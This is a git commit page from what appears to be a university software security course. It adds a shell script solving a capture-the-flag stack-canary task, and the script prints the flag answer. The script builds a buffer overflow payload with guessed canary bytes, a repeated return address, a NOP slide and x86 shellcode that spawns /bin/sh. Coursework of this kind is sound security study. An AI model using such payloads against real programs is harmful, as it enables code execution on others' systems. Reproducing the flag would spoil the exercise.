[Assignment-6] solution task 7 (stack canaries)
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 59s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 1m1s
Latex Build / build-latex (Assignment 6 - Software Security - Teil 2) (push) Successful in 58s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 28s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 8s
Latex Build / build-latex (Assignment 6 - Software Security - Teil 2) (pull_request) Successful in 8s
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 59s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 1m1s
Latex Build / build-latex (Assignment 6 - Software Security - Teil 2) (push) Successful in 58s
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (pull_request) Successful in 28s
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (pull_request) Successful in 8s
Latex Build / build-latex (Assignment 6 - Software Security - Teil 2) (pull_request) Successful in 8s
This commit is contained in:
Sascha Tommasone
parent
8ab148a95f
commit
688fdcd404
GPG key ID:
751068A86FCAA217
1 changed files with 28 additions and 0 deletions
28
Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh
Executable file
28
Assignment 6 - Software Security - Teil 2/fake_canary/solution.sh
Executable file
|
|
@ -0,0 +1,28 @@
|
||||||
|
#!/bin/bash
|
||||||
|
|
||||||
|
# flag{CANARY_IS_ALSO_AN_ISLAND}
|
||||||
|
|
||||||
|
######### Exploit #########
|
||||||
|
# Step 1: Choose a random canary candidate and overwrite the buffer with 'A's, then insert the canary candidate.
|
||||||
|
# Note: Only canaries without null bytes can be used due to the use of strcpy.
|
||||||
|
case $(( RANDOM % 3 )) in
|
||||||
|
0)
|
||||||
|
printf "AAAAAAAAAAAAAAAA\xa9\x67\xa3\x70"
|
||||||
|
;;
|
||||||
|
1)
|
||||||
|
printf "AAAAAAAAAAAAAAAA\xc1\xd1\xce\x4b"
|
||||||
|
;;
|
||||||
|
2)
|
||||||
|
printf "AAAAAAAAAAAAAAAA\x0e\x8b\xba\x08"
|
||||||
|
;;
|
||||||
|
esac
|
||||||
|
|
||||||
|
# Step 2: Fill the buffer with a candidate return address
|
||||||
|
printf "\x10\xd6\xff\xff%.0s" {1..30}
|
||||||
|
|
||||||
|
# Step 3: Write a lot of NOPs to stdout as a slide for the shellcode
|
||||||
|
printf "\x90%.0s" {1..2000}
|
||||||
|
|
||||||
|
# Step 4: Write the provided shellcode to stdout
|
||||||
|
printf "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"
|
||||||
|
###########################
|
||||||
Loading…
Reference in a new issue